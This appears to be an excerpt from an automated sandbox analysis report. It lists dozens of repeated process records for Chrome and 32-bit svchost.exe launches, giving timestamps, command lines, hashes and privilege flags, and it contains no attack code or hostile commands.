                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1988,i,12758286000912440692,11284502875771047049,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:52
                                                                                                                                                                                            Start time:12:42:59
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:53
                                                                                                                                                                                            Start time:12:43:00
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1984 --field-trial-handle=1944,i,4936340759003262573,15814975481951039996,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:54
                                                                                                                                                                                            Start time:12:43:00
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:55
                                                                                                                                                                                            Start time:12:43:03
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:56
                                                                                                                                                                                            Start time:12:43:03
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1984,i,3689067430776497247,15300495909368681371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:57
Start time:12:43:07
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:58
Start time:12:43:07
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1972,i,8812933395650124059,17698073702536386733,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:59
Start time:12:43:08
Start date:04/01/2025
Path:C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):true
Commandline:svchost.exe
Imagebase:0x60000
File size:46'504 bytes
MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:60
Start time:12:43:11
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:61
Start time:12:43:11
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1936,i,2605296248091638972,4924302696092150325,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:63
Start time:12:43:16
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:64
Start time:12:43:16
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1472 --field-trial-handle=1980,i,15377228353991002800,792711668187999877,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:65
Start time:12:43:16
Start date:04/01/2025
Path:C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):true
Commandline:svchost.exe
Imagebase:0x60000
File size:46'504 bytes
MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:66
Start time:12:43:21
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:67
Start time:12:43:22
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1460 --field-trial-handle=1996,i,306334268389520684,17870841813551360438,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:68
Start time:12:43:24
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:69
Start time:12:43:25
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1992,i,3378677205698214136,1924167881851413353,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:70
                                                                                                                                                                                            Start time:12:43:25
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:71
                                                                                                                                                                                            Start time:12:43:29
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:72
                                                                                                                                                                                            Start time:12:43:29
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=868 --field-trial-handle=2020,i,696290173973552029,16877605372930337061,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:73
                                                                                                                                                                                            Start time:12:43:33
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:74
                                                                                                                                                                                            Start time:12:43:33
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1956,i,12129368793975855261,4084447202771776108,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:75
                                                                                                                                                                                            Start time:12:43:33
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:76
                                                                                                                                                                                            Start time:12:43:36
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:77
                                                                                                                                                                                            Start time:12:43:36
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1976,i,5375429189451205296,3038177405675182667,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:78
                                                                                                                                                                                            Start time:12:43:40
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:79
Start time:12:43:41
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1980,i,8051270230576347227,15887782478097552568,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:80
Start time:12:43:41
Start date:04/01/2025
Path:C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):true
Commandline:svchost.exe
Imagebase:0x60000
File size:46'504 bytes
MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:81
Start time:12:43:46
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:82
Start time:12:43:46
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1988,i,5804494753339918936,5217131698543492645,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:83
Start time:12:43:51
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:84
Start time:12:43:52
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1136,i,1930181798274664567,3542273984303113262,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:85
Start time:12:43:52
Start date:04/01/2025
Path:C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):true
Commandline:svchost.exe
Imagebase:0x60000
File size:46'504 bytes
MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:86
Start time:12:43:55
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:87
Start time:12:43:55
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1668,i,10836949039064754798,10619019416050471488,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:88
Start time:12:43:59
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:89
Start time:12:43:59
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1972,i,17733880235770984801,5447189613793920795,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                                                            Target ID:90
                                                                                                                                                                                            Start time:12:44:00
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:91
                                                                                                                                                                                            Start time:12:44:04
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
